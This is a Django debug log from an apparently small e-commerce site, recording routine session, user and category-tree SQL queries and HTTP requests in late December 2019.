args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 22, 46, 57, 869497, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 22:46:57] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 22:47:00,668 utils 2749 140297243715328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T22:47:00.659048+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 22, 47, 0, 659048, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 22:47:00,671 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 22:47:00,714 utils 2749 140297243715328 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 22:47:00,724 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T22:47:00.722401+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 22, 47, 0, 722401, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 22:47:00] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 22:47:05,248 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:05,259 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:05,265 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:05,269 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:05,275 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:05,280 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:05,283 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:05,287 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:05,291 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:05,297 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:05,301 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:05,304 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:05,308 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:05,312 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:05,318 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:05,322 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:05,326 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:05,330 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:05,333 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:05,340 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:47:05,343 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:05,347 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:05,351 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:05,355 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:05,359 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:05,365 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:05,368 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:05,372 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:05,376 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:05,380 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:05,386 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:05,390 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:05,394 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:05,398 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:05,402 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:05,408 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:05,412 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:05,416 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:05,419 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:05,423 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:05,427 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:05,432 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:05,436 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:05,443 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:05,449 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:05,453 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:47:11,665 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:11,676 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:11,682 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:11,686 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:11,693 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:11,697 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:11,701 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:11,707 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:11,711 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:11,716 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:11,720 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:11,724 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:11,728 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" 